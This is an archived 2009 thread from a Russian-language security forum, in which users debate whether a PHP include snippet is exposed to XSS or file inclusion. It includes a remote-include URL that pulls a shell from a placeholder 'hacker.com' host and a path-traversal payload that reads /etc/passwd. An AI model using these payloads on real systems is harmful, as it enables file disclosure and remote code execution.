ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

23.04.2009, 19:12
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме: 2375039
Репутация:
1160
|
|
Сообщение от Pashkela
Это вообще небезопасно, если честно. Фильтровать обязательно. Хотя бы от XSS (вообще-то)
Фильтровать-то обязательно надо - понятно, а каким образом там появятся XSS ?
|
|
|

23.04.2009, 19:13
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
Сообщение от Pashkela
Это вообще небезопасно, если честно. Фильтровать обязательно. Хотя бы от XSS (вообще-то)
Если несложно,покажи пример как провести ксс с этим куском кода.(в позновательных целях)
|
|
|

23.04.2009, 19:14
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме: 2375039
Репутация:
1160
|
|
Сообщение от m0Hze
Если несложно,покажи пример как провести ксс с этим куском кода.(в позновательных целях)
+1, тоже стало интересно.
|
|
|

23.04.2009, 19:20
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Сообщение от DDoSька
+1, тоже стало интересно.
Ну вот тут почитайте, например:
http://www.virtuax.be/fztr/index.php?title=XSS_Intraframe_Logger
и тут кое-что:
http://securityvulns.ru/Tdocument29.html
а также LFI (PHP-inj):
http://n0ns3ns3.livejournal.com/219202.html (ctrl+f "include")
Последний раз редактировалось Pashkela; 23.04.2009 в 19:27..
|
|
|

23.04.2009, 19:27
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме: 2375039
Репутация:
1160
|
|
Сообщение от Pashkela
Ну вот тут почитайте, например:
http://www.virtuax.be/fztr/index.php?title=XSS_Intraframe_Logger
и тут кое-что:
http://securityvulns.ru/Tdocument29.html
Мы хотели пример на данном куске кода выше, который показа nilux
/index.php?page=http://hacker.com/shell.php).
В скрипте nilux`не проинклудилось бы
Последний раз редактировалось DDoSька; 23.04.2009 в 19:30..
|
|
|

23.04.2009, 19:15
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
Подскажите функцию которая определяет есть ли кусочек слова (к примеру в $_GET['my_get'])(не путайте с проверкой целой части слов)
Если есть кусочек слова то выводил что нибуть
зы Pashkela тоже интересно насчет XSS 
|
|
|

23.04.2009, 19:17
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
strpos,stripos,preg_match,array_search,in_array
|
|
|

23.04.2009, 19:35
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
2 DDoSька:
это врядли можно продемонстрировать полноценно, когда выложено только:
PHP код:
include("page".$GET['id'].".php");
Чтобы понять, что тут КОНКРЕТНЫЙ LFI, просто прочтите то, чему вы поверите:
http://forum.antichat.ru/thread23501.html
и не надо меня впредь просить искать уязвимость в коде:
остальной код (скрытый) имеет значение, для демонстрации уязвимости, когда просят именно так - "нет ты скажи, как именно здесь можно всё похерить"
/index.php?page=http://hacker.com/shell.php).
В скрипте nilux`не проинклудилось бы
а я не говорил о RFI, тут LFI, что очень часто достаточно
т.е. например:
/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd%00 очень даже просто могло бы, при определенных обстоятельствах, дать свои плоды
Последний раз редактировалось Pashkela; 23.04.2009 в 19:38..
|
|
|

23.04.2009, 19:47
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
Не то 
|
|
|

23.04.2009, 19:51
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме: 2375039
Репутация:
1160
|
|
Сообщение от m0Hze
Не то 
Это точно , от xss от отшли к php-inc
да и там "page1.php"
page/../../config.php , разве даст плоды?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|